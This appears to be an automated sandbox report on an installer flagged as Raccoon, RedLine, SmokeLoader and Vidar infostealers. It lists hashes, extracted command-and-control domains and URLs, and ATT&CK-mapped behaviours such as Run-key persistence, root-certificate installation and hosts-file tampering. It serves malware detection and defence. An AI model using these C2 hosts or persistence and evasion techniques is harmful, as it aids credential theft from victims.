raccoon | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

Target

Install.exe
Size

497KB
MD5

41a5f4fd1ea7cac4aa94a87aebccfef0
SHA1

0d0abf079413a4c773754bf4fda338dc5b9a8ddc
SHA256

97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
SHA512

5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Score

10^/10

raccoon redline smokeloader vidar 04.05.222rr 9afb493c6f82d08075dbbfa7d93ce97f1dbf4733 backdoor discovery evasion infostealer persistence stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

04.05.222RR

redworksite.info:80

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes

url4cnc
https://tttttt.me/antitantief3

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

resource	yara_rule
behavioral29/memory/5636-225-0x0000000000400000-0x000000000041C000-memory.dmp	family_redline
behavioral29/memory/5636-226-0x00000000004163C6-mapping.dmp	family_redline
behavioral29/files/0x000200000001ab13-242.dat	family_redline
behavioral29/files/0x000200000001ab13-241.dat	family_redline
behavioral29/memory/1244-342-0x00000000004163C6-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 11 IoCs

pid	Process
1040	Install.tmp
4052	Ultra.exe
3736	ultramediaburner.exe
3420	ultramediaburner.tmp
2972	Fyvicufaecae.exe
2132	UltraMediaBurner.exe
2308	Fazhasecusae.exe
4808	sskiper.exe
5076	KiffMainE1.exe
4484	001.exe
4524	828001925.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral29/files/0x001600000001a99b-194.dat	upx
behavioral29/files/0x001600000001a99b-195.dat	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Fyvicufaecae.exe

Loads dropped DLL 1 IoCs

pid	Process
1040	Install.tmp

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Gashygetamae.exe\""	Ultra.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
415	api.ipify.org
531	ipinfo.io
533	ipinfo.io
225	ipinfo.io
233	api.myip.com
301	ip-api.com
223	ipinfo.io
287	ipinfo.io
309	ipinfo.io
459	ip-api.com
234	api.myip.com
308	ipinfo.io
543	ipinfo.io
101	ip-api.com

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe	Ultra.exe
File created	C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe.config	Ultra.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-MM4CL.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Mail\Gashygetamae.exe.config	Ultra.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-RSDHL.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Mail\Gashygetamae.exe	Ultra.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 23 IoCs

pid	pid_target	Process	procid_target
8468	5788	WerFault.exe	296
8712	896	WerFault.exe	325
8812	7224	WerFault.exe	326
8804	5788	WerFault.exe	296
9112	896	WerFault.exe	325
7320	5788	WerFault.exe	296
6180	7224	WerFault.exe	326
2500	896	WerFault.exe	325
9160	7224	WerFault.exe	326
9416	896	WerFault.exe	325
9444	7224	WerFault.exe	326
9672	896	WerFault.exe	325
9900	7224	WerFault.exe	326
9972	896	WerFault.exe	325
10180	7224	WerFault.exe	326
4132	7224	WerFault.exe	326
7752	5692	WerFault.exe	461
4032	5692	WerFault.exe	461
4868	5692	WerFault.exe	461
8688	5692	WerFault.exe	461
2356	5692	WerFault.exe	461
9784	5788	WerFault.exe	296
8408	5788	WerFault.exe	296

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
5800	timeout.exe
9756	timeout.exe
7972	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
8876	bitsadmin.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
5580	taskkill.exe
2224	taskkill.exe
8016	taskkill.exe
800	taskkill.exe
8264	taskkill.exe
7420	taskkill.exe
5136	taskkill.exe
5432	taskkill.exe
2920	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ee16bf0bfc40d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000065d2a7db95fb407883fdf2ccae865418bd42f9be9afa1ec1fa0e22e79c1dac83360db486eaea3aa81c4eba6a7330437a126605962430062b948dba20f7413d9d02c12464426ffe2216e1ad0ef8166b68a4d2a605198b36ea7a9dbb90a0b21ec45f8eee1329a894043e554d74465aca7af1279ed6f02ac6e6f3dd0bb4ea90d7d90514d6f2b4b60041a74a555cce1ab9fe59067407b82f2576f2efab9495fb4aa4ecf207f2b2b95c1fb4605b7160783b54f20d43adc5b9c7bd7072dd9bbe134f61e2caccfc69d2a107c037392cb892ea1e68de5c5f0ee81b67c605dd7433f985158c3b0df0ce1fb29e5d70bf33238a9047d0174c3910dc8ca5934a34fe0acb1cb9a5e5da1fd4c1013247a9efbd9a7e2fcc8959e665e2b4188914e0674f65aa432fa368896d75d9be7708839d9d15902d600c450f3fd39233a5826687c679b62b0f4a6479f159856095e49e0b209fdecddcaa7974fe3c95e003f97e1031510f913c7b798b2ae3e64380f29a07f5fd8abc8154977ef755ddea6841c7c9f858d59850364734ce811ca0a98417582973b37d069b3d6769f68918e99ca6250f586609965b1fa5330f2c	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify.	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 155a400cfc40d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Fyvicufaecae.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203